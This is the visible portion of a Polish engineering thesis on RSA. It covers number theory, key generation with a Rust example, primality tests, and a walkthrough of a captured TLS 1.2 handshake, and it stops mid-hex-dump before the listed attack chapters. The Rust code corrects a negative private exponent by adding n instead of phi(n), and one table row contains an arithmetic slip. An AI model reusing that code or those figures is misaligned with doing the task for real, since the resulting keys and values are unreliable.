POLITECHNIKA POZNAŃSKA

WYDZIAŁ AUTOMATYKI, ROBOTYKI I ELEKTROTECHNIKI

Instytut Matematyki



PRACA DYPLOMOWA INŻYNIERSKA **SYSTEM RSA**

Krystian Baran

Promotor: dr Anna Iwaszkiewicz-Rudoszańska

(kserokopia z podpisami)

Podziękowania

```
Składam serdecznie podziękowania promotorowi, komisji egzaminacyjnej, Stack Overflow, TryHackMe,
```

I inni ...

Spis treści

Ws	stęp .			9
1.	Pod	stawy c	lziałania systemu RSA	11
	1.1.	Dziele	nie z resztą	11
	1.2.	Rozsze	erzony algorytm Euklidesa	11
		1.2.1.	Przykład wykorzystania rozszerzonego algorytmu Euklidesa	13
	1.3.	Funkc	ja Eulera	13
	1.4.	Chińsl	kie twierdzenie o resztach	14
	1.5.	Algory	rtm RSA	14
		1.5.1.	Wyznaczanie kluczy	14
		1.5.2.	Szyfrowanie i odszyfrowywanie	15
	1.6.	Przyk	ład działania systemu RSA	16
	1.7.	Wybra	ne testy pierwszości	18
		1.7.1.	Probabilistyczny test Fermata [1]	18
		1.7.2.	Probabilistyczny test Millera-Rabina	19
2.	Pod	stawy c	lziałania protokołu SSL	21
	2.1.	Czym	jest SSL/TLS	21
	2.2.	SSL H	andshake [2]	22
		2.2.1.	ClientHello	22
		2.2.2.	ServerHello	23
		2.2.3.	Client key exchange	25
		2.2.4.	Change cipher spec	26
	2.3.	Dane a	aplikacji	27
	2.4.	Alerty	SSL/TLS	27
3.	Wyb	orane at	taki na system RSA	29
	3.1.	Rozkła	ad dużych liczb	29
	3.2.	Wspól	ny moduł [3]	33
	3.3.	Atak z	z wybranym szyfrogramem [3]	33
	3.4.	Mały	wykładnik publiczny	34
		3 4 1	Przykład z implementacja	35

3.5. Mały wykładnik prywatny	36
3.5.1. Przykład z implementacją	37
3.6. Atak z wybranym szyfrogramem Bleichenbachera	39
3.6.1. PKCS #1 [4]	39
3.6.2. Idea [5]	40
4. Przykład ataku Bleichenbachera	41
4.1. Tworzenie certyfikatu SSL i kompilacja	41
4.2. Serwer z WolfSSL	41
4.3. Klient z WolfSSL	45
4.4. Kod programu do ataku	47
4.5. Dalsze możliwości rozwoju	52
Bibliografia	55
Dodatek A	57
Dodatek B	61
Dodatek C	63
Dodatek D	67
Strzeszczenie	75
Abstract	77

Wstęp

Kryptografia i systemy kryptograficzne miały głównie zastosowanie w wojskach jako bezpieczna metoda komunikacji. Systemy kryptograficzne z kluczem publicznym natomiast pojawiły się dopiero w 1978 gdy Rivest, Shamir i Adleman wynaleźli pierwszy system kryptograficzny z kluczem publicznym. Ten system nazywany jest teraz RSA zostanie on omówiony. Wraz z pojawieniem się nowego systemu pojawiały się problemy implementacji jak i możliwe na niego ataki. Ponieważ jest to system tylko teoretyczne bezpieczny to jest on co raz mniej wykorzystywany. Natomiast ataki na ten system są interesujące ze względu matematycznego jak i implementacji.

Praca składa się z czterech rozdziałów. W pierwszym opisane są podstawowe pojęcia matematyczne oraz sam system RSA. Pojęcia jak rozszerzony algorytm Euklidesa lub samo działanie systemu RSA zostały poprzedzone przykładami. W drugim rozdziale jest opisany protokół SSL.TLS. Jest to natomiast temat wymagający osobną pracę, zatem został on opisany na podstawie przykładu, co powinno ułatwić zrozumienie podstawowych działań. Trzeci rozdział dedykowany jest opisem wybranych ataków na system RSA wraz z implementacją w kodzie tych ataków. Tam gdzie pojawia się implementacja w kodzie to został także przedstawiony własny przykład. Ostatni rozdział precyzuje atak z wybranym szyfrogramem Bleichenbachera na podstawie własnego serwera.

Kody programów wraz z innymi ppotrzebnymi plikami można znaleźć na podanym linku https://github.com/kiszkot/myThesisOnRSACryptosystem

1. Podstawy działania systemu RSA

System RSA jest przykładem systemu kryptograficznego asymetrycznego z kluczem publicznym i prywatnym. System ten jest bezpieczny teoretycznie. Niebezpieczeństwo związane z użytkowaniem tego systemu polega na jego niewłaściwej implementacji przez użytkowników.

W tym rozdziale zostaną omówione podstawy tego systemu z przykładami.

1.1. Dzielenie z resztą

Niech $a, b, k \in \mathbb{Z}$. Liczba a dzieli liczbę b, jeżeli istnieje takie k, dla którego $b = k \cdot a$. Oznacza się to jako a|b.

Definicja 1.1. [7] Liczby $a, b \in \mathbb{Z}$ przystają do siebie modulo $n \in \mathbb{N}$, jeżeli n | (a - b). Pisze się wtedy $a = b \pmod{n}$.

Dla $a, b \in \mathbb{Z}$ i $n \in \mathbb{N}$ zapis $a = b \pmod{n}$ jest równoważny zapisowi $a = n \cdot k + b$ dla pewnego $k \in \mathbb{Z}$.

Liczba b może być wtedy resztą z dzielenia a przez n. W szczególności b może być liczbą ze zbioru $\{0,1,\ldots,n-1\}$.

1.2. Rozszerzony algorytm Euklidesa

Algorytm Euklidesa pozwala obliczać największy wspólny dzielnik, opierając się na fakcie przedstawionym poniżej.

Fakt 1.1. [1] $\text{NWD}(a, b) = \text{NWD}(b, a \pmod{b}) \text{ dla } a, b \in \mathbb{N}.$

Zapis NWD $(b, a \pmod{n})$ oznacza NWD(b, c), gdzie $a = c \pmod{b}$, za $a \pmod{b}$. W algorytmie Euklidesa za $a \pmod{b}$ bierze się resztę z dzielenia a przez b.

Obliczając kolejno reszty z dzielenia aż do momentu uzyskania zerowej reszty, otrzymuje się $\mathrm{NWD}(a,b)$. Będzie to ostatnia niezerowa reszta.

$$a = b \cdot q_{2} + r_{2},$$

$$b = r_{2} \cdot q_{3} + r_{3},$$

$$r_{2} = r_{3} \cdot q_{4} + r_{4},$$

$$...$$

$$r_{n} = r_{n+1} \cdot q_{n+2} + r_{n+2},$$

$$...$$

$$r_{m} = r_{m+1} \cdot q_{m+2} + 0.$$

Rozszerzony algorytm Euklidesa oblicza nie tylko największy wspólny dzielnik, ale też współczynniki x_i i y_i równania typu $ax_i + by_i = r_i$. Reszty r_0 i r_1 uzyskiwane są przez podstawienie do równania powyżej $x_0 = 1$, $y_0 = 0$ dla r_0 oraz $x_1 = 0$, $y_1 = 1$ dla r_2 . Dla ostatniej niezerowej reszty równanie będzie postaci ax + by = NWD(a, b).

$$a = b \cdot q_{2} + r_{2} \implies r_{2} = a \cdot 1 + b \cdot (-q_{2}),$$

$$b = r_{2} \cdot q_{3} + r_{3} \implies r_{3} = b - r_{2}q_{3} = b - aq_{3} + bq_{2}q_{3} = a \cdot (-q_{3}) + b \cdot (1 + q_{3}q_{2}),$$

$$r_{2} = r_{3} \cdot q_{4} + r_{4} \implies r_{4} = r_{2} - r_{3}q_{4} = a - bq_{2} - bq_{4}(1 + q_{2}) + aq_{3}q_{4} =$$

$$= a \cdot (1 + q_{4}q_{3}) + b \cdot (-q_{2} - q_{4}(1 + q_{2})),$$

$$...$$

$$r_{n} = a \cdot (x_{n-2} - q_{n}x_{n-1}) + b \cdot (y_{n-2} - q_{n}y_{n-1}).$$

Poniżej zostały zebrane współczynniki w postaci ciągów iteracyjnych:

$$r_i = \begin{cases} r_0 = a \\ r_1 = b \\ r_i = r_{i-2} \pmod{r_{i-1}}, & i > 1 \end{cases}, \quad q_i = \lfloor \frac{r_{i-2}}{r_{i-1}} \rfloor, \quad i > 1 ,$$

$$x_{i} = \begin{cases} x_{0} = 1 \\ x_{1} = 0 \\ x_{i} = x_{i-2} - q_{i} \cdot x_{i-1}, & i > 1 \end{cases}, y_{i} = \begin{cases} y_{0} = 0 \\ y_{1} = 1 \\ y_{i} = y_{i-2} - q_{i} \cdot y_{i-1}, & i > 1 \end{cases}.$$

Obliczenia dobiegają końca, jeżeli $r_k=0$ dla pewnego $k\in\mathbb{N}$. Wtedy NWD $(a,b)=r_{k-1}$ oraz $a\cdot x_{k-1}+b\cdot y_{k-1}=r_{k-1}$.

1.2.1. Przykład wykorzystania rozszerzonego algorytmu Euklidesa

Niech a = 41 oraz b = 12. Wtedy:

k	r_k	q_k	x_k	y_k
0	41	_	1	0
1	12	_	0	1
2	5	3	$1 - 3 \cdot 0 = 1$	$0 - 3 \cdot 1 = -3$
3	2	2	$0 - 2 \cdot 1 = -2$	$1 - 2 \cdot (-3) = 7$
4	1	2	$1 - 2 \cdot (-2) = 5$	$-3 - 2 \cdot 7 = -17$
5	0	2	$-2 - 2 \cdot 5 = -12$	$5 - 2 \cdot (-13) = 31$

Zatem, na podstawie wykonanych obliczeń, NWD(41, 12) = 1. Ponadto $41 \cdot 5 + 12 \cdot (-17) = 1$.

1.3. Funkcja Eulera

Funkcja Eulera jest funkcją, której dziedzina jest zbiór liczb naturalnych. Wartość tej funkcje jest zależna od rozkładu jej argumentu na czynniki pierwsze.

Definicja 1.2. [1] Jeżeli NWD(a, b) = 1, gdzie $a, b \in \mathbb{Z}$, to liczby a i b nazywane są względnie pierwsze.

Definicja 1.3. [1] Funkcja Eulera oznaczana jako $\varphi(n)$ dla $n \geq 1$ wyznacza liczbę liczb całkowitych względnie pierwszych z n z przedziału [1, n].

Poniżej przedstawiono niektóre własności i wzory dla tej funkcji.

Fakt 1.2. [1] Funkcja Eulera ma następujące własności:

- 1. Jeżeli p jest liczbą pierwszą, to $\varphi(p) = p 1$.
- 2. Funkcja Eulera jest multiplikatywna, to jest $\varphi(mn) = \varphi(m)\varphi(n)$ jeżeli NWD(m,n) = 1.
- 3. Jeżeli $n=p_1^{\alpha_1}p_2^{\alpha_2}\dots p_k^{\alpha_k}$ jest rozkładem liczby n na iloczyn różnych czynników pierwszych, to

$$\varphi(n) = n\left(1 - \frac{1}{p_1}\right)\left(1 - \frac{1}{p_2}\right)\dots\left(1 - \frac{1}{p_k}\right).$$

Twierdzenie 1.1 (Twierdzenie Eulera). [6] Dla dowolnych $a \in \mathbb{Z}$, $n \in \mathbb{N}$ jeżeli NWD(a, n) = 1, to $a^{\varphi(n)} = 1 \pmod{n}$.

Niech teraz p będzie liczbą pierwszą. Wtedy zachodzi następująca własność:

Twierdzenie 1.2 (Małe twierdzenie Fermata). [6] Dla dowolnych liczb $a \in \mathbb{Z}$ zachodzi równość $a^p = a \pmod{p}$. Jeżeli dodatkowo NWD(a, p) = 1, to $a^{p-1} = 1 \pmod{p}$.

1.4. Chińskie twierdzenie o resztach

Twierdzenie 1.3. [1] Jeżeli liczby $m_1, m_2, m_3, \ldots, m_n \in \mathbb{N}$ są parami względnie pierwsze, to jest $\mathrm{NWD}(m_i, m_j) = 1$ dla $i \neq j$, to układ kongruencji

$$\begin{cases} x = a_1 \pmod{m_1}, \\ x = a_2 \pmod{m_2}, \\ & \dots \\ x = a_n \pmod{m_n} \end{cases}$$

ma rozwiązanie. Rozwiązanie to jest jednoznaczne modulo $\prod_{i=1}^n m_i$.

Jedna z metod rozwiązywania takiego układu równań polega na podstawieniu rozwiązania typu $x=m_n\cdot k+a_n$ do kolejnych równań, aż do osiągnięcia wyrażenia postaci $x=b\cdot\prod_{i=1}^n m_i+c$. Rozwiązaniem jest wtedy liczba c.

1.5. Algorytm RSA

Omówione zostanie teraz wyznaczanie kluczy w systemie RSA oraz szyfrowanie i odszyfrowywanie wiadomości.

1.5.1. Wyznaczanie kluczy

W pierwszym kroku wybierane są dwie różne liczby pierwsze p i q. Obliczany jest ich iloczyn n=pq oraz wartość funkcji Eulera dla n:

$$\varphi(n) = n\left(1 - \frac{1}{p}\right)\left(1 - \frac{1}{q}\right) = pq\left(1 - \frac{1}{p}\right)\left(1 - \frac{1}{q}\right) = (p-1)(q-1).$$

Wybierana jest liczba e względnie pierwsza z $\varphi(n)$.

Następnie obliczana jest odwrotność liczby e modulo $\varphi(n)$, czyli d spełniające nierówność:

$$ed = 1 \pmod{\varphi(n)}$$
.

Liczbę tę można wyznaczyć korzystając z rozszerzonego algorytmu Euklidesa dla e i $\varphi(n)$. Kluczem publicznym systemu RSA będzie para (n,e). Kluczem prywatnym będzie liczba d.

1.5.2. Szyfrowanie i odszyfrowywanie

Dowolny ciąg znaków w komputerach można przetworzyć w liczbę. Zatem niech liczba całkowita $m \in [0, n-1]$ będzie wiadomością, która będzie szyfrowana. Zaszyfrowaną wiadomością jest:

$$c = m^e \pmod{n}$$
.

Aby wiadomość odszyfrować, należy podnieść liczbę c do potęgi d, czyli klucza prywatnego:

$$c^d \pmod{n} = m \pmod{n}$$
.

Poprawność odszyfrowywania. Niech para (n, e) będzie kluczem publicznym systemu RSA, a d kluczem prywatnym.

Niech NWD(m,n)=1. Ponieważ $ed=1\pmod{\varphi(n)}$, to $ed=1+\varphi(n)\cdot k$ dla pewnego $k\in\mathbb{Z}$. Ponadto, z twierdzenia Eulera, jeżeli NWD(a,n)=1, to $a^{\varphi(n)}\pmod{n}$. Wtedy:

$$c^d \pmod{n} = (m^e)^d \pmod{n} = m^{ed} \pmod{n} = m^{1+\varphi(n)k} \pmod{n} = m$$

= $m(m^{\varphi(n)})^k \pmod{n} = m \pmod{n}$.

Niech teraz NWD(m,n) > 1. Możliwe są trzy przypadki: NWD(m,n) = n, NWD(m,n) = p lub NWD(m,n) = q. Jeżeli NWD(m,n) = n, to wiadomość m = 0 (mod n) oraz szyfrogram c = 0 (mod n). Jeżeli NWD(m,n) = p, to:

$$\begin{cases} c^d = m^{ed} = m^{k\varphi(n)+1} \pmod{q} = m^{(p-1)(q-1)k}m \pmod{q} = \\ = m \pmod{q}, \\ c^d = m^{ed} \pmod{p} = 0 \pmod{p}. \end{cases}$$

Z drugiego równania wynika, że $c^d=p\cdot r+0$ dla pewnego $r\in\mathbb{Z}$. Podstawiając do pierwszego równania otrzyma się:

$$pr = m \pmod{q},$$

 $r = m \cdot p^{-1} \pmod{q}.$

To oznacza, że $r = q \cdot t + mp^{-1}$ dla pewnego $t \in \mathbb{Z}$. Warto zauważyć, że liczba p^{-1} spełnia równanie $pp^{-1} = 1 \pmod{q}$, czyli $pp^{-1} = q \cdot s + 1$ dla pewnego $s \in \mathbb{Z}$. Ponadto, $mq = 0 \pmod{n}$ ponieważ NWD(m, n) = p. Zatem:

$$c^d \pmod{n} = p \cdot r = p(qt + mp^{-1}) \pmod{n} =$$

= $n \cdot t + mpp^{-1} \pmod{n} = n \cdot t + m(qs + 1) \pmod{n} =$
= $nt + mqs + m \pmod{n} = m \pmod{n}.$

Analogicznie dla NWD(m, n) = q.

15

1.6. Przykład działania systemu RSA

Do przykładu wykorzystano kod napisany w języku programowania **Rust**. Wykorzystano ponadto pakiet *rug 1.18* do liczb o dowolnej dokładności. Pomimo dostępności w tym pakiecie funkcji do rozszerzonego algorytmu Euklidesa, napisano własną implementacje, nie tylko dla liczb tego pakietu, ale też dla liczb dostępnych pierwotnie.

Niech p=7919 oraz q=6841. Wtedy n=54173879 oraz $\varphi(n)=54159120$. Korzystając z funkcji losującej dostępnej w powyższym pakiecie, generowano losowe wartości $1 < e < \varphi(n)$ aż do otrzymania liczby względnie pierwszej z $\varphi(n)$. Wylosowano wartość e=43003183. Ponieważ rozszerzony algorytm Euklidesa zwraca także szukane d, to dostano także klucz prywatny. Ustalono zatem:

- (54173879, 43003183) klucz publiczny,
- 7494847 klucz prywatny.

Aby zaszyfrować wiadomość Hi! należy ją przekształcić na liczbę. Konwersja polega na przedstawieniu każdej litery jako liczby z tablicy ASCII i zestawienie do listy. Każda litera jest więc liczbą 8-bitową, czyli liczbą od 0 do 255. Liczby w liście są cyframi liczby w bazie 256. Na podstawie tych cyfr tworzona jest liczba dziesiętna. Zatem Hi! = 4745505.

Korzystając z algorytmu wcześniej przedstawionego, tworzony jest szyfrogram c=1052000=[16,13,96]. Nie przedstawiono go w postaci tekstu, ponieważ znaki od 0 do 31 nie są tekstem, lecz są przeznaczone do operacji jak tabulacja, przesunięcie kursora do początku linii lub sygnalizowanie końca tekstu.

Odszyfrowanie wykonywane jest jak wcześniej przedstawiono. Wynik jest liczbą dziesiętną. Żeby dostać z tego tekst, liczbę przedstawiono jako poszczególne cyfry w bazie 256 w posortowaniu "Most Significat Digit first". Taką tablicę można przekonwertować na znaki, co jest odszyfrowaną wiadomością:

$$4745505 = Hi!$$

Poniżej przedstawiono kod wykorzystany do przykładu.

```
fn rsa_example() {
   let p: Integer = Integer::from(7919);
   let q: Integer = Integer::from(6841);
```

```
4
      let n: Integer = p.clone() * q.clone();
5
      let phi: Integer = (p - 1) * (q - 1);
6
      let mut rand: RandState = RandState::new();
7
      let mut e: Integer = phi.clone().random_below(&mut rand);
8
      let mut res = euclides_gmp(e.clone(), phi.clone());
9
      while res.0 != 1 {
10
           e = phi.clone().random_below(&mut rand);
          res = euclides_gmp(e.clone(), phi.clone());
11
12
13
      let d: Integer;
      if res.1 < 0 {
14
15
          d = res.1 + n.clone();
16
       } else {
17
          d = res.1;
18
       println!("Generated key ({}, {}), {}", n, e, d);
19
20
21
      let text: String = String::from("Hi!");
      let mut bytes: Vec<u8> = Vec::new();
22
23
      for i in text.chars() {
24
          bytes.push(i as u8);
25
      let m: i128 = Integer::from_digits(&bytes, Order::MsfLe).to_i128_wrapping();
26
       println!("Message to encrypt: {} = {}", text, m);
27
28
29
      let c: Integer = match Integer::from(m).pow_mod(&e.clone(), &n.clone()) {
30
          Ok(c) => c, //.to_i128_wrapping(),
31
           Err(_) => unreachable!(),
32
      };
33
34
       print!("Encrypted message: {} = [", &c);
       for i in c.to_digits::<u8>(Order::MsfBe) {
35
36
          print!("{},", i);
37
38
       println!("]");
39
       let dec = match Integer::from(c).pow_mod(&d, &n) {
40
41
          Ok(dec) => dec.to_i128_wrapping(),
42
           Err(_) => unreachable!(),
43
      };
44
       let mut tmp: String = String::new();
      for i in Integer::from(dec).to_digits::<u8>(Order::MsfBe) {
45
46
          tmp.push(i as char);
47
48
       println!("Decrypted message: {} = {}", dec, tmp);
49 }
```

Listing 1.1. ./ssl attack/src/main.rs, od 156 do 204

1.7. Wybrane testy pierwszości

Testy pierwszości służą do sprawdzenia, czy dana liczba jest liczbą pierwszą. Dla małych liczb można kolejno dzielić liczbę przez wszystkie liczby od niej mniejsze i sprawdzić, czy jest pierwsza. Dla dużych liczb natomiast taka metoda jest za wolna. Liczby pierwsze szczególnej postaci jak liczby pierwsze Mersenna lub liczby pierwsze Fermata mają wzór jawny, zatem łatwiej sprawdzić pierwszość takiej liczby. Natomiast, dla większości liczb, stosuje się testy probabilistyczne. Testy probabilistyczne wskazują, czy dana liczba jest pierwsza z ustalonym prawdopodobieństwem. Zatem pewność, że dana liczba jest pierwsza uzyskuje się na podstawie wielu prób. Dwa takie testy zostały poniżej omówione.

1.7.1. Probabilistyczny test Fermata [1]

Test Fermata jest testem probabilistycznym opierający się na twierdzeniu Fermata. Dla nieparzystej liczby n wybierana jest liczba a spełniająca nierówność $1 \le a \le n-1$. Wtedy:

- Jeżeli $a^{n-1} \neq 1 \pmod{n}$, to liczba n jest na pewno liczbą złożoną.
- Jeżeli $a^{n-1} = 1 \pmod{n}$, to liczba n jest liczbą pseudopierwszą, czyli może być liczbą pierwszą.

Pseudopierwszość wynika z tego, że twierdzenie Fermata nie jest równoważnością. Oznacza to, że ze spełnienia jego tezy nie wynika pierwszość liczby.

Istnieją takie liczby, dla których kongruencja $a^{n-1} = 1 \pmod{n}$ zachodzi dla każdego $a \in \mathbb{Z}$, NWD(a,n) = 1. Takie liczby nazywane są liczbami Carmichaela. Dla wybranej liczby złożonej n, która nie jest liczbą Carmichaela, przynajmniej połowa liczb $a \in [0, n-1]$ nie spełnia warunku $a^{n-1} = 1 \pmod{n}$. Zatem prawdopodobieństwo poprawnego rozstrzygnięcia pierwszości dla liczb, które nie są liczbami Carmichaela, przy jednokrotnym zastosowaniu testu wynosi co najmniej $\frac{1}{2}$. Problem z liczbami Carmichaela jest rozwiązany w teście Millera-Rabina.

Przykład

Niech liczba n=47 będzie liczbą o nieznanej pierwszości. Wybrana została liczba a=3. Dla tej liczby kongruencja testowa jest postaci:

$$a^{n-1} = 3^{46} \pmod{47} = 1 \pmod{47}.$$

Oznacza to, że liczba może być pierwsza. Wybrana została teraz liczba a=4. Dla tej liczby kongruencja testowa jest postaci:

$$4^{46} \pmod{47} = 1 \pmod{47}$$
.

Ponownie, liczba n może być pierwsza. Wybrana została teraz liczba a=5. Dla tej liczby kongruencja testowa jest postaci:

$$5^{46} \pmod{47} = 1 \pmod{47}$$
.

Ponieważ przez trzeci raz uzyskano tą samą odpowiedź, to można stwierdzić, że liczba n=47 jest liczbą pierwszą, z prawdopodobieństwem co najmniej $1-\left(\frac{1}{2}\right)^3$.

1.7.2. Probabilistyczny test Millera-Rabina

Test Millera-Rabina jest znany też jako mocny test pierwszości. Test ten oparty jest na następującym fakcie:

Fakt 1.3. [7] Niech n będzie nieparzystą liczbą pierwszą oraz $n-1=2^s r$, gdzie r jest nieparzyste. Niech ponadto a będzie liczbą całkowitą taką, że NWD(a, n) = 1. Wtedy albo $a^r = 1 \pmod{n}$ albo $a^{2^j r} = -1 \pmod{n}$ dla pewnego j, $0 \le j \le s - 1$.

Zatem, aby sprawdzić pierwszość liczby n, należy rozłożyć liczbę $n-1=2^s r$. Wtedy:

- Jeżeli $a^r \neq 1 \pmod{n}$ oraz $a^{2^j r} \neq -1 \pmod{n}$ dla każdego $j, 0 \leq j \leq s-1$, to n jest liczbą złożoną.
- Jeżeli $a^r = 1 \pmod{n}$ lub $a^{2^j r} = -1 \pmod{n}$ dla pewnego $j, 0 \le j \le s 1$, to n może być liczbą pierwszą.

Przykład

Niech n=57 będzie liczbą, której pierwszość zostanie sprawdzona. Wtedy $n-1=56=2^3\cdot 7$. Dobrana została na początku liczba a=3. Uzyskujemy wtedy kongruencje:

$$3^7 = 21 \pmod{57} \neq 1 \pmod{57},$$

 $3^{2 \cdot 7} = 42 \pmod{57} \neq -1 \pmod{57},$
 $3^{2^2 \cdot 7} = 54 \pmod{57} \neq -1 \pmod{57},$
 $3^{2^3 \cdot 7} = 9 \pmod{57} \neq -1 \pmod{57}.$

Na podstawie testu Millera-Rabina, liczba 57 jest liczbą złożoną.

2. Podstawy działania protokołu SSL

W tym rozdziale zostanie wzięty pod uwagę protokół SSL/TLS i niektóre jego aspekty. Zostanie przedstawiony przykład oraz zostaną omówione niektóre różnice pomiędzy wersjami. W celu rozróżniania liczb postaci dziesiętnej od bajtów w postaci szesnastkowej, tę ostatnie będą wyprzedzane przez znak "0x".

2.1. Czym jest SSL/TLS

Nazwa protokołu SSL pochodzi z angielskiego, co oznacza "Secure Socket Layer". Jest to zatem warstwa, która znajduje się, w modelu OSI (ang. Open System Interconnection model), pomiędzy warstwą aplikacji i warstwą połączenia. Nazywana jest warstwą prezentacji. Protokół TLS jest podobny w działaniu do protokół SSL ponieważ jest jego rozwinięciem. Bierze nazwę z angielskiego "Transport Layer Security".

Ponieważ nie jest to protokół transferu danych, to jedna z jego zalet jest taka, że można go stosować nad istniejącym już protokołem transferu danych takim jak TCP/IP. TLS stosowany jest na co dzień przy wyświetlaniu witryn internetowych (HTTPS), wysyłaniu elektronicznych wiadomości (SMTPS) i innych przypadkach.

Protokół SSL/TLS zawiera podprotokoły odpowiedzialne za pierwsze połączenie, alerty oraz dane. Te podprotokoły będą w dalszym ciągu nazywane protokołami. Każdy podprotokół ma własne bloki danych, które są wysyłane przez warstwę połączenia. Ta warstwa wysyła dane w postaci pakietów składających z bloków o długości jednego bajta. Te bajty podlegają konkatenacji i są uporządkowane w taki sposób, że pierwsze pojawiające się bloki przyporządkowane są do większych wartości. Uporządkowanie to znane jest z angielskiego jako "big endian".

Ze względu na to, że wersja TLS 1.3 nie wspiera systemu RSA, to nie zostanie ona omówiona.

2.2. SSL Handshake [2]

Uzyskanie połączenia protokołem SSL/TLS odbywa się za pomocą procesu znanego jako SSL Handshake. Jest to także podprotokół protokołu SSL, który zawiera podprotokoły. Proces połączenia odbywa się poprzez wymianę pakietów między klientem i serwerem. Przechwycono taką wymianę danych pomiędzy własnym serwerem i klientem. Dane te zostaną wykorzystane do dalszego wyjaśnienia.

2.2.1. ClientHello

Po połączeniu TCP wysyłana jest przez klienta seria danych, którą nazywa się ClientHello. Poniżej została taka seria danych zaprezentowana. Można w niej rozróżnić pięć kolumn. Pierwsza jest pomocniczą kolumną zliczająca, w bazie szesnastkowej, liczbę wcześniejszych bajtów. Dwie kolejne kolumny są danymi w postaci szesnastkowej rozdzielone co bajt. Ostatnie dwie kolumny to odpowiedniki wcześniejszych dwóch kolumn z tabeli znaków ASCII.

```
00000000
           16 03 03 00 95 01 00 00
                                    91 03 03 af ee 89 13 29
                                                              .....)
 00000010
           8a ff 3d 94 8a 78 a8 71
                                    24 0b 7a d4 f9 78 2d 13
                                                              .. = ..x.q \$.z..x-.
3 00000020 e8 e6 84 a7 e1 7c 20 b6 ea b8 11 00 00 3c c0 2c
                                                              .+.0./.. ......
4 00000030 c0 2b c0 30 c0 2f 00 9f 00 9e 00 9d 00 9c cc a9
 00000040
           cc a8 cc aa c0 27 c0 23 c0 28 c0 24 c0 0a c0 09
                                                              ...., .# .(.$....
6 00000050 c0 14 c0 13 00 6b 00 67 00 39 00 33 00 3d 00 3c
                                                              ....k.g .9.3.=.<
 00000060 00 35 00 2f cc 14 cc 13 cc 15 01 00 00 2c 00 0a
                                                              .5./.... ....,..
8 00000070 00 0e 00 0c 00 10 00 13 00 15 00 17 00 18 00 19
                                                              . . . . . . . . . . . . . . . . . .
9 00000080 00 0d 00 12 00 10 06 03 05 03 04 03 02 03 06 01
                                                              . . . . . . . . . . . . . . . . . . .
 00000090 05 01 04 01 02 01 00 17
                                    00 00
```

Pierwszy bajt 0x16 sygnalizuje protokół SSL handshake. Drugi i trzeci bajt 0x0303 oznaczają maksymalną wersję SSL/TLS, która jest obsługiwana przez klienta. 0x0300 odpowiada za SSL 3, 0x0301 za TLS v1.0, 0x0302 za TLS v1.1 a 0x0303 za TLS v1.2. W tym przypadku jest to TLS v1.2. Kolejne dwa bajty 0x0095 wyznaczają pozostała długość wiadomości. W tym przypadku jest to 149 bajtów.

Kolejny bajt 0x01 sygnalizuje początek wiadomości *ClientHello*. Następne trzy bajty wyznaczają, jak poprzednio, pozostałą długość wiadomości (0x000091 czyli 145 bajtów). Kolejne dwa bajty są powtórzeniem maksymalnej wersji obsługiwanego protokołu SSL/TLS.

W 32 bajtach, czyli od 0xAF do 0x11, znajduje się odcisk czasowy oraz losowa wartość, która będzie wykorzystana do obliczenia klucza połączenia. Kolejna wartość to długość bajtów identyfikatora sesji. W tym przypadku jest to 0x00 czyli 0, zatem

nie jest wznawiana żadna sesja. W przypadku wartości większej od zera, po tym bajcie znalazłyby się bajty odpowiadające identyfikatorowi połączenia, który serwer wyznacza.

Kolejne dwa bajty, 0x003C czyli 60, wyznaczają długość obsługiwanych przez klienta szyfrogramów. Są to bajty od 0xC0 do 0x15. Dla każdego szyfrogramu przeznaczone są trzy bajty – pierwsze dwa identyfikują specyfikacje szyfru, a trzeci funkcję skrótu. Serwer wybierze jeden z tych szyfrów do wymiany klucza.

Pozostałe dane przeznaczone są dla dodatków. Dodatki zostały zaimplementowane od wersji TLS v1.2. Ponieważ te dane są doliczane do długości pojawiającej się na początku bloku, to ich dodanie nie wpływa na połączenie ze starszymi wersjami.

Dodatki nie zostana omówione.

2.2.2. ServerHello

Kolejnym zestawem danych nazywany jest *ServerHello*. Są to dane wysyłane przez serwera do klienta, zawierające informacje takie jak certyfikaty, wybrany szyfr, identyfikator połączenia i inne. Poniżej zostały takie dane przedstawione.

```
00000000 16 03 03 00 50 02 00 00 4c 03 03 8f 0d a3 23 8e
                                                               ....P... L....#.
2
      00000010
               67 ea c1 b3 74 23 45 1b
                                      35 a1 4a 93 e7 8a 67 a2
                                                               g...t#E. 5.J...g.
3
      00000020 af 40 ca b1 ab 16 5f 77 83 f0 e1 20 bc 3e 34 8b
                                                              .@...._w .....>4.
                                                               <e.n..w? 6....vZ
      00000030 3c 65 81 6e 8f ba 77 3f 36 a1 ea 05 a3 dc 76 5a
      00000040 c7 23 66 0a dc e6 6c b0 24 64 22 50 00 3c 00 00
                                                               .#f...1. $d"P.<..
5
6
      00000050
               04 00 17 00 00
7
      00000055
               16 03 03 03 82 0b 00 03 7e 00 03 7b 00 03 78 30
                                                               ........ ~..{..x0
8
      00000065 82 03 74 30 82 02 5c a0 03 02 01 02 02 14 6e 72
                                                               ..t0..\. .....nr
9
      00000075 3d 3f f5 1d 1d cb 99 cd 48 ae fa 89 46 c3 a5 30
                                                              =?.... H...F..0
10
      00000085 03 c1 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05
                                                               ..O...*. H......
                                                               .0E1.0.. .U....PL
11
      00000095
              00 30 45 31 0b 30 09 06
                                      03 55 04 06 13 02 50 4c
12
      000000A5
               31 13 30 11 06 03 55 04
                                      08 Oc 0a 53 6f 6d 65 2d
                                                               1.0...U. ...Some-
                                      1f 06 03 55 04 0a 0c 18
13
      000000B5 53 74 61 74 65 31 21 30
                                                               State1!0 ...U....
14
      000000C5 49 6e 74 65 72 6e 65 74
                                      20 57 69 64 67 69 74 73
                                                               Internet Widgits
15
      000000D5 20 50 74 79 20 4c 74 64
                                      30 1e 17 0d 32 32 31 31
                                                               Pty Ltd 0...2211
16
      000000E5
              31 36 31 31 32 34 31 34
                                      5a 17 0d 32 33 31 31 31
                                                              16112414 Z..23111
               36 31 31 32 34 31 34 5a
17
      000000F5
                                      30 41 31 0b 30 09 06 03
                                                               6112414Z 0A1.0...
      00000105 55 04 06 13 02 45 55 31
                                      Of 30 0d 06 03 55 04 08
                                                              U....EU1 .O...U..
18
19
      ..Banana 1!0...U.
20
      ... Inter net Widg
21
      00000135 69 74 73 20 50 74 79 20
                                      4c 74 64 30 82 01 22 30
                                                               its Pty Ltd0.."0
22
               0d 06 09 2a 86 48 86 f7
                                      0d 01 01 01 05 00 03 82
      00000145
                                                               ...*.H.. ......
23
      00000155 01 0f 00 30 82 01 0a 02
                                      82 01 01 00 de 70 35 26
                                                               ...0.... p5&
24
